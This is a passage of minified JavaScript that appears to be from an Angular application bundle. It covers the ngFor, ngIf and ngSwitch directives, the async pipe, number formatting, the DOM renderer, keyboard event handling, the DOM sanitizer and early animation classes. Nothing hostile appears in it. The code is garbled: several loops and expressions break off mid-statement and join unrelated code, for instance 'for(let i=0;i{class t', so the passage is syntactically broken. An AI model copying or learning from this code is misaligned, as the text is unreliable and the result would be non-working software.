t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(yd))},t.\u0275dir=Ot({type:t,selectors:[["","ngFor","","ngForOf",""]],inputs:{ngForOf:"ngForOf",ngForTrackBy:"ngForTrackBy",ngForTemplate:"ngForTemplate"},standalone:!0}),t})();function _P(t,a){t.context.$implicit=a.item}let Ri=(()=>{class t{constructor(e,i){this._viewContainer=e,this._context=new Rre,this._thenTemplateRef=null,this._elseTemplateRef=null,this._thenViewRef=null,this._elseViewRef=null,this._thenTemplateRef=i}set ngIf(e){this._context.$implicit=this._context.ngIf=e,this._updateView()}set ngIfThen(e){gP("ngIfThen",e),this._thenTemplateRef=e,this._thenViewRef=null,this._updateView()}set ngIfElse(e){gP("ngIfElse",e),this._elseTemplateRef=e,this._elseViewRef=null,this._updateView()}_updateView(){this._context.$implicit?this._thenViewRef||(this._viewContainer.clear(),this._elseViewRef=null,this._thenTemplateRef&&(this._thenViewRef=this._viewContainer.createEmbeddedView(this._thenTemplateRef,this._context))):this._elseViewRef||(this._viewContainer.clear(),this._thenViewRef=null,this._elseTemplateRef&&(this._elseViewRef=this._viewContainer.createEmbeddedView(this._elseTemplateRef,this._context)))}static ngTemplateContextGuard(e,i){return!0}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","ngIf",""]],inputs:{ngIf:"ngIf",ngIfThen:"ngIfThen",ngIfElse:"ngIfElse"},standalone:!0}),t})();class Rre{constructor(){this.$implicit=null,this.ngIf=null}}function gP(t,a){if(a&&!a.createEmbeddedView)throw new Error(`${t} must be a TemplateRef, but received '${Wo(a)}'.`)}class l6{constructor(a,e){this._viewContainerRef=a,this._templateRef=e,this._created=!1}create(){this._created=!0,this._viewContainerRef.createEmbeddedView(this._templateRef)}destroy(){this._created=!1,this._viewContainerRef.clear()}enforceState(a){a&&!this._created?this.create():!a&&this._created&&this.destroy()}}let Jf=(()=>{class t{constructor(){this._defaultUsed=!1,this._caseCount=0,this._lastCaseCheckIndex=0,this._lastCasesMatched=!1}set ngSwitch(e){this._ngSwitch=e,0===this._caseCount&&this._updateDefaultCases(!0)}_addCase(){return this._caseCount++}_addDefault(e){this._defaultViews||(this._defaultViews=[]),this._defaultViews.push(e)}_matchCase(e){const i=e==this._ngSwitch;return this._lastCasesMatched=this._lastCasesMatched||i,this._lastCaseCheckIndex++,this._lastCaseCheckIndex===this._caseCount&&(this._updateDefaultCases(!this._lastCasesMatched),this._lastCaseCheckIndex=0,this._lastCasesMatched=!1),i}_updateDefaultCases(e){if(this._defaultViews&&e!==this._defaultUsed){this._defaultUsed=e;for(let i=0;i{class t{constructor(e,i,n){this.ngSwitch=n,n._addCase(),this._view=new l6(e,i)}ngDoCheck(){this._view.enforceState(this.ngSwitch._matchCase(this.ngSwitchCase))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Jf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchCase",""]],inputs:{ngSwitchCase:"ngSwitchCase"},standalone:!0}),t})(),d6=(()=>{class t{constructor(e,i,n){n._addDefault(new l6(e,i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Jf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchDefault",""]],standalone:!0}),t})(),Yv=(()=>{class t{constructor(e,i,n){this._ngEl=e,this._differs=i,this._renderer=n,this._ngStyle=null,this._differ=null}set ngStyle(e){this._ngStyle=e,!this._differ&&e&&(this._differ=this._differs.find(e).create())}ngDoCheck(){if(this._differ){const e=this._differ.diff(this._ngStyle);e&&this._applyChanges(e)}}_setStyle(e,i){const[n,r]=e.split("."),c=-1===n.indexOf("-")?void 0:vl.DashCase;null!=i?this._renderer.setStyle(this._ngEl.nativeElement,n,r?`${i}${r}`:i,c):this._renderer.removeStyle(this._ngEl.nativeElement,n,c)}_applyChanges(e){e.forEachRemovedItem(i=>this._setStyle(i.key,null)),e.forEachAddedItem(i=>this._setStyle(i.key,i.currentValue)),e.forEachChangedItem(i=>this._setStyle(i.key,i.currentValue))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(f1),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngStyle",""]],inputs:{ngStyle:"ngStyle"},standalone:!0}),t})(),_1=(()=>{class t{constructor(e){this._viewContainerRef=e,this._viewRef=null,this.ngTemplateOutletContext=null,this.ngTemplateOutlet=null,this.ngTemplateOutletInjector=null}ngOnChanges(e){if(e.ngTemplateOutlet||e.ngTemplateOutletInjector){const i=this._viewContainerRef;if(this._viewRef&&i.remove(i.indexOf(this._viewRef)),this.ngTemplateOutlet){const{ngTemplateOutlet:n,ngTemplateOutletContext:r,ngTemplateOutletInjector:c}=this;this._viewRef=i.createEmbeddedView(n,r,c?{injector:c}:void 0)}else this._viewRef=null}else this._viewRef&&e.ngTemplateOutletContext&&this.ngTemplateOutletContext&&(this._viewRef.context=this.ngTemplateOutletContext)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngTemplateOutlet",""]],inputs:{ngTemplateOutletContext:"ngTemplateOutletContext",ngTemplateOutlet:"ngTemplateOutlet",ngTemplateOutletInjector:"ngTemplateOutletInjector"},standalone:!0,features:[sa]}),t})();function hm(t,a){return new gi(2100,!1)}class kre{createSubscription(a,e){return a.subscribe({next:e,error:i=>{throw i}})}dispose(a){a.unsubscribe()}}class Pre{createSubscription(a,e){return a.then(e,i=>{throw i})}dispose(a){}}const Ore=new Pre,Nre=new kre;let Jv=(()=>{class t{constructor(e){this._latestValue=null,this._subscription=null,this._obj=null,this._strategy=null,this._ref=e}ngOnDestroy(){this._subscription&&this._dispose(),this._ref=null}transform(e){return this._obj?e!==this._obj?(this._dispose(),this.transform(e)):this._latestValue:(e&&this._subscribe(e),this._latestValue)}_subscribe(e){this._obj=e,this._strategy=this._selectStrategy(e),this._subscription=this._strategy.createSubscription(e,i=>this._updateLatestValue(e,i))}_selectStrategy(e){if(qC(e))return Ore;if(bS(e))return Nre;throw hm()}_dispose(){this._strategy.dispose(this._subscription),this._latestValue=null,this._subscription=null,this._obj=null}_updateLatestValue(e,i){e===this._obj&&(this._latestValue=i,this._ref.markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma,16))},t.\u0275pipe=Fr({name:"async",type:t,pure:!1,standalone:!0}),t})(),bP=(()=>{class t{constructor(e){this._locale=e}transform(e,i,n){if(!function m6(t){return!(null==t||""===t||t!=t)}(e))return null;n=n||this._locale;try{return function vre(t,a,e){return function o6(t,a,e,i,n,r,c=!1){let d="",T=!1;if(isFinite(t)){let k=function Tre(t){let i,n,r,c,d,a=Math.abs(t)+"",e=0;for((n=a.indexOf("."))>-1&&(a=a.replace(".","")),(r=a.search(/e/i))>0?(n<0&&(n=r),n+=+a.slice(r+1),a=a.substring(0,r)):n<0&&(n=a.length),r=0;"0"===a.charAt(r);r++);if(r===(d=a.length))i=[0],n=1;else{for(d--;"0"===a.charAt(d);)d--;for(n-=r,i=[],c=0;r<=d;r++,c++)i[c]=Number(a.charAt(r))}return n>22&&(i=i.splice(0,21),e=n-1,n=1),{digits:i,exponent:e,integerLen:n}}(t);c&&(k=function Are(t){if(0===t.digits[0])return t;const a=t.digits.length-t.integerLen;return t.exponent?t.exponent+=2:(0===a?t.digits.push(0,0):1===a&&t.digits.push(0),t.integerLen+=2),t}(k));let q=a.minInt,Y=a.minFrac,te=a.maxFrac;if(r){const ut=r.match(_re);if(null===ut)throw new Error(`${r} is not a valid digit info`);const Ze=ut[1],yt=ut[3],It=ut[5];null!=Ze&&(q=s6(Ze)),null!=yt&&(Y=s6(yt)),null!=It?te=s6(It):null!=yt&&Y>te&&(te=Y)}!function Ere(t,a,e){if(a>e)throw new Error(`The minimum number of digits after fraction (${a}) is higher than the maximum (${e}).`);let i=t.digits,n=i.length-t.integerLen;const r=Math.min(Math.max(a,n),e);let c=r+t.integerLen,d=i[c];if(c>0){i.splice(Math.max(t.integerLen,c));for(let Y=c;Y=5)if(c-1<0){for(let Y=0;Y>c;Y--)i.unshift(0),t.integerLen++;i.unshift(1),t.integerLen++}else i[c-1]++;for(;n=k?Re.pop():T=!1),te>=10?1:0},0);q&&(i.unshift(q),t.integerLen++)}(k,Y,te);let pe=k.digits,Re=k.integerLen;const Fe=k.exponent;let Ne=[];for(T=pe.every(ut=>!ut);Re0?Ne=pe.splice(Re,pe.length):(Ne=pe,pe=[0]);const et=[];for(pe.length>=a.lgSize&&et.unshift(pe.splice(-a.lgSize,pe.length).join(""));pe.length>a.gSize;)et.unshift(pe.splice(-a.gSize,pe.length).join(""));pe.length&&et.unshift(pe.join("")),d=et.join(bd(e,i)),Ne.length&&(d+=bd(e,n)+Ne.join("")),Fe&&(d+=bd(e,Ba.Exponential)+"+"+Fe)}else d=bd(e,Ba.Infinity);return d=t<0&&!T?a.negPre+d+a.negSuf:a.posPre+d+a.posSuf,d}(t,function r6(t,a="-"){const e={minInt:1,minFrac:0,maxFrac:0,posPre:"",posSuf:"",negPre:"",negSuf:"",gSize:0,lgSize:0},i=t.split(";"),n=i[0],r=i[1],c=-1!==n.indexOf(".")?n.split("."):[n.substring(0,n.lastIndexOf("0")+1),n.substring(n.lastIndexOf("0")+1)],d=c[0],T=c[1]||"";e.posPre=d.substring(0,d.indexOf("#"));for(let q=0;q{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const MP="browser";function ag(t){return t===MP}function Zv(t){return"server"===t}let ese=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>new tse(At(ga),window)}),t})();class tse{constructor(a,e){this.document=a,this.window=e,this.offset=()=>[0,0]}setOffset(a){this.offset=Array.isArray(a)?()=>a:a}getScrollPosition(){return this.supportsScrolling()?[this.window.pageXOffset,this.window.pageYOffset]:[0,0]}scrollToPosition(a){this.supportsScrolling()&&this.window.scrollTo(a[0],a[1])}scrollToAnchor(a){if(!this.supportsScrolling())return;const e=function ise(t,a){const e=t.getElementById(a)||t.getElementsByName(a)[0];if(e)return e;if("function"==typeof t.createTreeWalker&&t.body&&(t.body.createShadowRoot||t.body.attachShadow)){const i=t.createTreeWalker(t.body,NodeFilter.SHOW_ELEMENT);let n=i.currentNode;for(;n;){const r=n.shadowRoot;if(r){const c=r.getElementById(a)||r.querySelector(`[name="${a}"]`);if(c)return c}n=i.nextNode()}}return null}(this.document,a);e&&(this.scrollToElement(e),e.focus())}setHistoryScrollRestoration(a){if(this.supportScrollRestoration()){const e=this.window.history;e&&e.scrollRestoration&&(e.scrollRestoration=a)}}scrollToElement(a){const e=a.getBoundingClientRect(),i=e.left+this.window.pageXOffset,n=e.top+this.window.pageYOffset,r=this.offset();this.window.scrollTo(i-r[0],n-r[1])}supportScrollRestoration(){try{if(!this.supportsScrolling())return!1;const a=vP(this.window.history)||vP(Object.getPrototypeOf(this.window.history));return!(!a||!a.writable&&!a.set)}catch(a){return!1}}supportsScrolling(){try{return!!this.window&&!!this.window.scrollTo&&"pageXOffset"in this.window}catch(a){return!1}}}function vP(t){return Object.getOwnPropertyDescriptor(t,"scrollRestoration")}class AP{}class p6 extends class bse extends class Foe{}{constructor(){super(...arguments),this.supportsDOMEvents=!0}}{static makeCurrent(){!function Woe(t){Bv||(Bv=t)}(new p6)}onAndCancel(a,e,i){return a.addEventListener(e,i,!1),()=>{a.removeEventListener(e,i,!1)}}dispatchEvent(a,e){a.dispatchEvent(e)}remove(a){a.parentNode&&a.parentNode.removeChild(a)}createElement(a,e){return(e=e||this.getDefaultDocument()).createElement(a)}createHtmlDocument(){return document.implementation.createHTMLDocument("fakeTitle")}getDefaultDocument(){return document}isElementNode(a){return a.nodeType===Node.ELEMENT_NODE}isShadowRoot(a){return a instanceof DocumentFragment}getGlobalEventTarget(a,e){return"window"===e?window:"document"===e?a:"body"===e?a.body:null}getBaseHref(a){const e=function Mse(){return ry=ry||document.querySelector("base"),ry?ry.getAttribute("href"):null}();return null==e?null:function vse(t){t4=t4||document.createElement("a"),t4.setAttribute("href",t);const a=t4.pathname;return"/"===a.charAt(0)?a:`/${a}`}(e)}resetBaseElement(){ry=null}getUserAgent(){return window.navigator.userAgent}getCookie(a){return uP(document.cookie,a)}}let t4,ry=null;const xP=new ni("TRANSITION_ID"),Tse=[{provide:Nv,useFactory:function Ase(t,a,e){return()=>{e.get(Lv).donePromise.then(()=>{const i=su(),n=a.querySelectorAll(`style[ng-transition="${t}"]`);for(let r=0;r{class t{build(){return new XMLHttpRequest}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const a4=new ni("EventManagerPlugins");let n4=(()=>{class t{constructor(e,i){this._zone=i,this._eventNameToPlugin=new Map,e.forEach(n=>n.manager=this),this._plugins=e.slice().reverse()}addEventListener(e,i,n){return this._findPluginFor(i).addEventListener(e,i,n)}addGlobalEventListener(e,i,n){return this._findPluginFor(i).addGlobalEventListener(e,i,n)}getZone(){return this._zone}_findPluginFor(e){const i=this._eventNameToPlugin.get(e);if(i)return i;const n=this._plugins;for(let r=0;r{class t{constructor(){this._stylesSet=new Set}addStyles(e){const i=new Set;e.forEach(n=>{this._stylesSet.has(n)||(this._stylesSet.add(n),i.add(n))}),this.onStylesAdded(i)}onStylesAdded(e){}getAllStyles(){return Array.from(this._stylesSet)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),sy=(()=>{class t extends IP{constructor(e){super(),this._doc=e,this._hostNodes=new Map,this._hostNodes.set(e.head,[])}_addStylesToHost(e,i,n){e.forEach(r=>{const c=this._doc.createElement("style");c.textContent=r,n.push(i.appendChild(c))})}addHost(e){const i=[];this._addStylesToHost(this._stylesSet,e,i),this._hostNodes.set(e,i)}removeHost(e){const i=this._hostNodes.get(e);i&&i.forEach(RP),this._hostNodes.delete(e)}onStylesAdded(e){this._hostNodes.forEach((i,n)=>{this._addStylesToHost(e,n,i)})}ngOnDestroy(){this._hostNodes.forEach(e=>e.forEach(RP))}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function RP(t){su().remove(t)}const _6={svg:"http://www.w3.org/2000/svg",xhtml:"http://www.w3.org/1999/xhtml",xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/",math:"http://www.w3.org/1998/MathML/"},g6=/%COMP%/g;function o4(t,a,e){for(let i=0;i{if("__ngUnwrap__"===a)return t;!1===t(a)&&(a.preventDefault(),a.returnValue=!1)}}let r4=(()=>{class t{constructor(e,i,n){this.eventManager=e,this.sharedStylesHost=i,this.appId=n,this.rendererByCompId=new Map,this.defaultRenderer=new C6(e)}createRenderer(e,i){if(!e||!i)return this.defaultRenderer;switch(i.encapsulation){case dc.Emulated:{let n=this.rendererByCompId.get(i.id);return n||(n=new kse(this.eventManager,this.sharedStylesHost,i,this.appId),this.rendererByCompId.set(i.id,n)),n.applyToHost(e),n}case 1:case dc.ShadowDom:return new Pse(this.eventManager,this.sharedStylesHost,e,i);default:if(!this.rendererByCompId.has(i.id)){const n=o4(i.id,i.styles,[]);this.sharedStylesHost.addStyles(n),this.rendererByCompId.set(i.id,this.defaultRenderer)}return this.defaultRenderer}}begin(){}end(){}}return t.\u0275fac=function(e){return new(e||t)(At(n4),At(sy),At(h1))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class C6{constructor(a){this.eventManager=a,this.data=Object.create(null),this.destroyNode=null}destroy(){}createElement(a,e){return e?document.createElementNS(_6[e]||e,a):document.createElement(a)}createComment(a){return document.createComment(a)}createText(a){return document.createTextNode(a)}appendChild(a,e){(NP(a)?a.content:a).appendChild(e)}insertBefore(a,e,i){a&&(NP(a)?a.content:a).insertBefore(e,i)}removeChild(a,e){a&&a.removeChild(e)}selectRootElement(a,e){let i="string"==typeof a?document.querySelector(a):a;if(!i)throw new Error(`The selector "${a}" did not match any elements`);return e||(i.textContent=""),i}parentNode(a){return a.parentNode}nextSibling(a){return a.nextSibling}setAttribute(a,e,i,n){if(n){e=n+":"+e;const r=_6[n];r?a.setAttributeNS(r,e,i):a.setAttribute(e,i)}else a.setAttribute(e,i)}removeAttribute(a,e,i){if(i){const n=_6[i];n?a.removeAttributeNS(n,e):a.removeAttribute(`${i}:${e}`)}else a.removeAttribute(e)}addClass(a,e){a.classList.add(e)}removeClass(a,e){a.classList.remove(e)}setStyle(a,e,i,n){n&(vl.DashCase|vl.Important)?a.style.setProperty(e,i,n&vl.Important?"important":""):a.style[e]=i}removeStyle(a,e,i){i&vl.DashCase?a.style.removeProperty(e):a.style[e]=""}setProperty(a,e,i){a[e]=i}setValue(a,e){a.nodeValue=e}listen(a,e,i){return"string"==typeof a?this.eventManager.addGlobalEventListener(a,e,PP(i)):this.eventManager.addEventListener(a,e,PP(i))}}function NP(t){return"TEMPLATE"===t.tagName&&void 0!==t.content}class kse extends C6{constructor(a,e,i,n){super(a),this.component=i;const r=o4(n+"-"+i.id,i.styles,[]);e.addStyles(r),this.contentAttr=function Ise(t){return"_ngcontent-%COMP%".replace(g6,t)}(n+"-"+i.id),this.hostAttr=function Rse(t){return"_nghost-%COMP%".replace(g6,t)}(n+"-"+i.id)}applyToHost(a){super.setAttribute(a,this.hostAttr,"")}createElement(a,e){const i=super.createElement(a,e);return super.setAttribute(i,this.contentAttr,""),i}}class Pse extends C6{constructor(a,e,i,n){super(a),this.sharedStylesHost=e,this.hostEl=i,this.shadowRoot=i.attachShadow({mode:"open"}),this.sharedStylesHost.addHost(this.shadowRoot);const r=o4(n.id,n.styles,[]);for(let c=0;c{class t extends wP{constructor(e){super(e)}supports(e){return!0}addEventListener(e,i,n){return e.addEventListener(i,n,!1),()=>this.removeEventListener(e,i,n)}removeEventListener(e,i,n){return e.removeEventListener(i,n)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const LP=["alt","control","meta","shift"],Nse={"\b":"Backspace","\t":"Tab","\x7f":"Delete","\x1b":"Escape",Del:"Delete",Esc:"Escape",Left:"ArrowLeft",Right:"ArrowRight",Up:"ArrowUp",Down:"ArrowDown",Menu:"ContextMenu",Scroll:"ScrollLock",Win:"OS"},Lse={alt:t=>t.altKey,control:t=>t.ctrlKey,meta:t=>t.metaKey,shift:t=>t.shiftKey};let zse=(()=>{class t extends wP{constructor(e){super(e)}supports(e){return null!=t.parseEventName(e)}addEventListener(e,i,n){const r=t.parseEventName(i),c=t.eventCallback(r.fullKey,n,this.manager.getZone());return this.manager.getZone().runOutsideAngular(()=>su().onAndCancel(e,r.domEventName,c))}static parseEventName(e){const i=e.toLowerCase().split("."),n=i.shift();if(0===i.length||"keydown"!==n&&"keyup"!==n)return null;const r=t._normalizeKey(i.pop());let c="",d=i.indexOf("code");if(d>-1&&(i.splice(d,1),c="code."),LP.forEach(k=>{const q=i.indexOf(k);q>-1&&(i.splice(q,1),c+=k+".")}),c+=r,0!=i.length||0===r.length)return null;const T={};return T.domEventName=n,T.fullKey=c,T}static matchEventFullKeyCode(e,i){let n=Nse[e.key]||e.key,r="";return i.indexOf("code.")>-1&&(n=e.code,r="code."),!(null==n||!n)&&(n=n.toLowerCase()," "===n?n="space":"."===n&&(n="dot"),LP.forEach(c=>{c!==n&&(0,Lse[c])(e)&&(r+=c+".")}),r+=n,r===i)}static eventCallback(e,i,n){return r=>{t.matchEventFullKeyCode(r,e)&&n.runGuarded(()=>i(r))}}static _normalizeKey(e){return"esc"===e?"escape":e}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const Bse=P9(Noe,"browser",[{provide:lm,useValue:MP},{provide:A9,useValue:function Wse(){p6.makeCurrent()},multi:!0},{provide:ga,useFactory:function Vse(){return function aE(t){H_=t}(document),document},deps:[]}]),FP=new ni(""),VP=[{provide:zv,useClass:class Ese{addToWindow(a){vo.getAngularTestability=(i,n=!0)=>{const r=a.findTestabilityInTree(i,n);if(null==r)throw new Error("Could not find testability for element.");return r},vo.getAllAngularTestabilities=()=>a.getAllTestabilities(),vo.getAllAngularRootElements=()=>a.getAllRootElements(),vo.frameworkStabilizers||(vo.frameworkStabilizers=[]),vo.frameworkStabilizers.push(i=>{const n=vo.getAllAngularTestabilities();let r=n.length,c=!1;const d=function(T){c=c||T,r--,0==r&&i(c)};n.forEach(function(T){T.whenStable(d)})})}findTestabilityInTree(a,e,i){if(null==e)return null;const n=a.getTestability(e);return null!=n?n:i?su().isShadowRoot(e)?this.findTestabilityInTree(a,e.host,!0):this.findTestabilityInTree(a,e.parentElement,!0):null}},deps:[]},{provide:I9,useClass:HD,deps:[qi,UD,zv]},{provide:HD,useClass:HD,deps:[qi,UD,zv]}],BP=[{provide:dt,useValue:"root"},{provide:yh,useFactory:function Fse(){return new yh},deps:[]},{provide:a4,useClass:Ose,multi:!0,deps:[ga,qi,lm]},{provide:a4,useClass:zse,multi:!0,deps:[ga]},{provide:r4,useClass:r4,deps:[n4,sy,h1]},{provide:qs,useExisting:r4},{provide:IP,useExisting:sy},{provide:sy,useClass:sy,deps:[ga]},{provide:n4,useClass:n4,deps:[a4,qi]},{provide:AP,useClass:Dse,deps:[]},[]];let HP=(()=>{class t{constructor(e){}static withServerTransition(e){return{ngModule:t,providers:[{provide:h1,useValue:e.appId},{provide:xP,useExisting:h1},Tse]}}}return t.\u0275fac=function(e){return new(e||t)(At(FP,12))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[...BP,...VP],imports:[rn,Loe]}),t})(),UP=(()=>{class t{constructor(e){this._doc=e}getTitle(){return this._doc.title}setTitle(e){this._doc.title=e||""}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function Use(){return new UP(At(ga))}(),i},providedIn:"root"}),t})();"undefined"!=typeof window&&window;let cy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new(e||t):At(jP),i},providedIn:"root"}),t})(),jP=(()=>{class t extends cy{constructor(e){super(),this._doc=e}sanitize(e,i){if(null==i)return null;switch(e){case oo.NONE:return i;case oo.HTML:return Fi(i,"HTML")?Hc(i):iv(this._doc,String(i)).toString();case oo.STYLE:return Fi(i,"Style")?Hc(i):i;case oo.SCRIPT:if(Fi(i,"Script"))return Hc(i);throw new Error("unsafe value used in a script context");case oo.URL:return Fi(i,"URL")?Hc(i):B0(String(i));case oo.RESOURCE_URL:if(Fi(i,"ResourceURL"))return Hc(i);throw new Error("unsafe value used in a resource URL context (see https://g.co/ng/security#xss)");default:throw new Error(`Unexpected SecurityContext ${e} (see https://g.co/ng/security#xss)`)}}bypassSecurityTrustHtml(e){return function W0(t){return new oE(t)}(e)}bypassSecurityTrustStyle(e){return function bl(t){return new rE(t)}(e)}bypassSecurityTrustScript(e){return function cE(t){return new IC(t)}(e)}bypassSecurityTrustUrl(e){return function Io(t){return new sE(t)}(e)}bypassSecurityTrustResourceUrl(e){return function hr(t){return new RC(t)}(e)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(e){let i=null;return i=e?new e:function Xse(t){return new jP(t.get(ga))}(At(Ko)),i},providedIn:"root"}),t})();class QP{}const wh="*";function nr(t,a){return{type:7,name:t,definitions:a,options:{}}}function En(t,a=null){return{type:4,styles:a,timings:t}}function $P(t,a=null){return{type:3,steps:t,options:a}}function KP(t,a=null){return{type:2,steps:t,options:a}}function zi(t){return{type:6,styles:t,offset:null}}function sn(t,a,e){return{type:0,name:t,styles:a,options:e}}function ng(t){return{type:5,steps:t}}function gn(t,a,e=null){return{type:1,expr:t,animation:a,options:e}}function s4(t=null){return{type:9,options:t}}function c4(t,a,e=null){return{type:11,selector:t,animation:a,options:e}}function XP(t){Promise.resolve().then(t)}class ly{constructor(a=0,e=0){this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._originalOnDoneFns=[],this._originalOnStartFns=[],this._started=!1,this._destroyed=!1,this._finished=!1,this._position=0,this.parentPlayer=null,this.totalTime=a+e}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}init(){}play(){this.hasStarted()||(this._onStart(),this.triggerMicrotask()),this._started=!0}triggerMicrotask(){XP(()=>this._onFinish())}_onStart(){this._onStartFns.forEach(a=>a()),this._onStartFns=[]}pause(){}restart(){}finish(){this._onFinish()}destroy(){this._destroyed||(this._destroyed=!0,this.hasStarted()||this._onStart(),this.finish(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this._started=!1,this._finished=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}setPosition(a){this._position=this.totalTime?a*this.totalTime:1}getPosition(){return this.totalTime?this._position/this.totalTime:1}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class YP{constructor(a){this._onDoneFns=[],this._onStartFns=[],this._finished=!1,this._started=!1,this._destroyed=!1,this._onDestroyFns=[],this.parentPlayer=null,this.totalTime=0,this.players=a;let e=0,i=0,n=0;const r=this.players.length;0==r?XP(()=>this._onFinish()):this.players.forEach(c=>{c.onDone(()=>{++e==r&&this._onFinish()}),c.onDestroy(()=>{++i==r&&this._onDestroy()}),c.onStart(()=>{++n==r&&this._onStart()})}),this.totalTime=this.players.reduce((c,d)=>Math.max(c,d.totalTime),0)}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this.players.forEach(a=>a.init())}onStart(a){this._onStartFns.push(a)}_onStart(){this.hasStarted()||(this._started=!0,this._onStartFns.forEach(a=>a()),this._onStartFns=[])}onDone(a){this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}hasStarted(){return this._started}play(){this.parentPlayer||this.init(),this._onStart(),this.players.forEach(a=>a.play())}pause(){this.players.forEach(a=>a.pause())}restart(){this.players.forEach(a=>a.restart())}finish(){this._onFinish(),this.players.forEach(a=>a.finish())}destroy(){this._onDestroy()}_onDestroy(){this._destroyed||(this._destroyed=!0,this._onFinish(),this.players.forEach(a=>a.destroy()),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}reset(){this.players.forEach(a=>a.reset()),this._destroyed=!1,this._finished=!1,this._started=!1}setPosition(a){const e=a*this.totalTime;this.players.forEach(i=>{const n=i.totalTime?Math.min(1,e/i.totalTime):1;i.setPosition(n)})}getPosition(){const a=this.players.reduce((e,i)=>null===e||i.totalTime>e.totalTime?i:e,null);return null!=a?a.getPosition():0}beforeDestroy(){this.players.forEach(a=>{a.beforeDestroy&&a.beforeDestroy()})}triggerCallback(a){const e="start"==a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}var JP=de(5486);function ZP(t){return new gi(3e3,!1)}function kce(){return"undefined"!=typeof window&&void 0!==window.document}function v6(){return void 0!==JP&&"[object process]"==={}.toString.call(JP)}function ep(t){switch(t.length){case 0:return new ly;case 1:return t[0];default:return new YP(t)}}function eO(t,a,e,i,n=new Map,r=new Map){const c=[],d=[];let T=-1,k=null;if(i.forEach(q=>{const Y=q.get("offset"),te=Y==T,pe=te&&k||new Map;q.forEach((Re,Fe)=>{let Ne=Fe,et=Re;if("offset"!==Fe)switch(Ne=a.normalizePropertyName(Ne,c),et){case"!":et=n.get(Fe);break;case wh:et=r.get(Fe);break;default:et=a.normalizeStyleValue(Fe,Ne,et,c)}pe.set(Ne,et)}),te||d.push(pe),k=pe,T=Y}),c.length)throw function bce(t){return new gi(3502,!1)}();return d}function A6(t,a,e,i){switch(a){case"start":t.onStart(()=>i(e&&T6(e,"start",t)));break;case"done":t.onDone(()=>i(e&&T6(e,"done",t)));break;case"destroy":t.onDestroy(()=>i(e&&T6(e,"destroy",t)))}}function T6(t,a,e){const i=e.totalTime,r=E6(t.element,t.triggerName,t.fromState,t.toState,a||t.phaseName,null==i?t.totalTime:i,!!e.disabled),c=t._data;return null!=c&&(r._data=c),r}function E6(t,a,e,i,n="",r=0,c){return{element:t,triggerName:a,fromState:e,toState:i,phaseName:n,totalTime:r,disabled:!!c}}function Gl(t,a,e){let i=t.get(a);return i||t.set(a,i=e),i}function tO(t){const a=t.indexOf(":");return[t.substring(1,a),t.slice(a+1)]}let D6=(t,a)=>!1,iO=(t,a,e)=>[],aO=null;function x6(t){const a=t.parentNode||t.host;return a===aO?null:a}(v6()||"undefined"!=typeof Element)&&(kce()?(aO=(()=>document.documentElement)(),D6=(t,a)=>{for(;a;){if(a===t)return!0;a=x6(a)}return!1}):D6=(t,a)=>t.contains(a),iO=(t,a,e)=>{if(e)return Array.from(t.querySelectorAll(a));const i=t.querySelector(a);return i?[i]:[]});let og=null,nO=!1;const oO=D6,rO=iO;let sO=(()=>{class t{validateStyleProperty(e){return function Oce(t){og||(og=function Nce(){return"undefined"!=typeof document?document.body:null}()||{},nO=!!og.style&&"WebkitAppearance"in og.style);let a=!0;return og.style&&!function Pce(t){return"ebkit"==t.substring(1,6)}(t)&&(a=t in og.style,!a&&nO&&(a="Webkit"+t.charAt(0).toUpperCase()+t.slice(1)in 